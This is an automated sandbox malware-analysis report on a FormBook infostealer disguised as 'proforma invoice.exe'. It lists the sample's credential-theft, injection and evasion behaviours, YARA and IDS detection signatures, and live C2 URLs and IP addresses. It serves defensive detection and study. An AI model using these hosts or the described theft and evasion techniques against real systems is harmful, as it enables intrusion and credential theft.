Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
proforma invoice.exe

Overview

General Information

Sample name:proforma invoice.exe
Analysis ID:1497807
MD5:77f8da00f3632972d585ff7efb0bea8c
SHA1:987ce549f5b8bb619bd78e5f88ae3cd132bb8f34
SHA256:aab17e4d4fcb75ffc655247c8f71df23d653b9b573d87eb2e32c589c543918f9
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • proforma invoice.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\proforma invoice.exe" MD5: 77F8DA00F3632972D585FF7EFB0BEA8C)
    • svchost.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\proforma invoice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • NpiZrjTdIDFUidJcY.exe (PID: 5544 cmdline: "C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 7692 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • NpiZrjTdIDFUidJcY.exe (PID: 2412 cmdline: "C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8032 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\proforma invoice.exe", CommandLine: "C:\Users\user\Desktop\proforma invoice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ParentImage: C:\Users\user\Desktop\proforma invoice.exe, ParentProcessId: 7568, ParentProcessName: proforma invoice.exe, ProcessCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ProcessId: 7584, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\proforma invoice.exe", CommandLine: "C:\Users\user\Desktop\proforma invoice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ParentImage: C:\Users\user\Desktop\proforma invoice.exe, ParentProcessId: 7568, ParentProcessName: proforma invoice.exe, ProcessCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ProcessId: 7584, ProcessName: svchost.exe

            Suricata Signatures

            Timestamp:2024-08-23T04:20:41.281611+0200
            SID:2855464
            Severity:1
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:21:00.064857+0200
            SID:2050745
            Severity:1
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-23T04:18:27.482705+0200
            SID:2050745
            Severity:1
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-23T04:19:44.582620+0200
            SID:2050745
            Severity:1
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-23T04:19:15.545135+0200
            SID:2855464
            Severity:1
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:20:54.962325+0200
            SID:2855464
            Severity:1
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:21:13.440847+0200
            SID:2050745
            Severity:1
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-23T04:19:36.939695+0200
            SID:2855464
            Severity:1
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:18:43.216056+0200
            SID:2855464
            Severity:1
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:20:08.147806+0200
            SID:2855464
            Severity:1
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:21:08.372143+0200
            SID:2855464
            Severity:1
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:20:10.695239+0200
            SID:2855464
            Severity:1
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:19:39.479593+0200
            SID:2855464
            Severity:1
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:21:33.147887+0200
            SID:2855464
            Severity:1
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:19:52.981754+0200
            SID:2855464
            Severity:1
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:19:58.472511+0200
            SID:2050745
            Severity:1
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-23T04:21:05.837189+0200
            SID:2855464
            Severity:1
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:20:43.986058+0200
            SID:2855464
            Severity:1
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:20:57.530827+0200
            SID:2855464
            Severity:1
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:19:50.401644+0200
            SID:2855464
            Severity:1
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:19:55.506439+0200
            SID:2855464
            Severity:1
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:20:33.106164+0200
            SID:2050745
            Severity:1
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-23T04:20:52.510744+0200
            SID:2855464
            Severity:1
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:18:48.408334+0200
            SID:2855464
            Severity:1
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:19:42.073478+0200
            SID:2855464
            Severity:1
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:19:18.178646+0200
            SID:2855464
            Severity:1
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:20:39.664204+0200
            SID:2855464
            Severity:1
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:21:10.944772+0200
            SID:2855464
            Severity:1
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:17:48.756945+0200
            SID:2050745
            Severity:1
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-23T04:19:13.014934+0200
            SID:2855464
            Severity:1
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:21:28.069753+0200
            SID:2855464
            Severity:1
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:21:30.603596+0200
            SID:2855464
            Severity:1
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:18:51.068512+0200
            SID:2050745
            Severity:1
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-23T04:20:05.444683+0200
            SID:2855464
            Severity:1
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:18:45.757577+0200
            SID:2855464
            Severity:1
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-23T04:20:46.356118+0200
            SID:2050745
            Severity:1
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-23T04:19:22.189090+0200
            SID:2050745
            Severity:1
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.sandranoll.com/aroo/Avira URL Cloud: Label: malware
            Source: http://www.gipsytroya.com/tf44/Avira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: www.sandranoll.comVirustotal: Detection: 10%Perma Link
            Source: www.anuts.topVirustotal: Detection: 7%Perma Link
            Source: www.gipsytroya.comVirustotal: Detection: 8%Perma Link
            Source: http://www.gipsytroya.com/tf44/Virustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for submitted file
            Source: proforma invoice.exeReversingLabs: Detection: 28%
            Source: proforma invoice.exeVirustotal: Detection: 29%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: proforma invoice.exeJoe Sandbox ML: detected
            Source: proforma invoice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103470681.000000000056E000.00000002.00000001.01000000.00000004.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4103116967.000000000056E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: proforma invoice.exe, 00000000.00000003.1653485893.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, proforma invoice.exe, 00000000.00000003.1652243415.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1759986126.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1761687857.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.0000000003200000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1851656992.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1849341364.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: proforma invoice.exe, 00000000.00000003.1653485893.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, proforma invoice.exe, 00000000.00000003.1652243415.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1759986126.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1761687857.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.0000000003200000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000003.1851656992.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1849341364.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1849243613.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1817977068.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000003.1787838240.0000000000894000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4104507554.000000000555C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4103317306.0000000003205000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920600296.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B35C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4104507554.000000000555C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4103317306.0000000003205000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920600296.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B35C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1849243613.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1817977068.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000003.1787838240.0000000000894000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B0DBBE
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B168EE FindFirstFileW,FindClose,0_2_00B168EE
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00B1698F
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D076
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D3A9
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B19642
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B1979D
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00B19B2B
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00B15C97
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0305BC20 FindFirstFileW,FindNextFileW,FindClose,3_2_0305BC20
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax3_2_03049870
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov ebx, 00000004h3_2_04DF053E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 5.44.111.162:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49740 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49769 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 172.67.210.102:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 172.67.210.102:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 172.67.210.102:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49773 -> 172.67.210.102:80
            Source: Joe Sandbox ViewIP Address: 23.251.54.212 23.251.54.212
            Source: Joe Sandbox ViewIP Address: 213.145.228.16 213.145.228.16
            Source: Joe Sandbox ViewASN Name: VPSQUANUS VPSQUANUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: DOMAINTECHNIKAT DOMAINTECHNIKAT
            Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
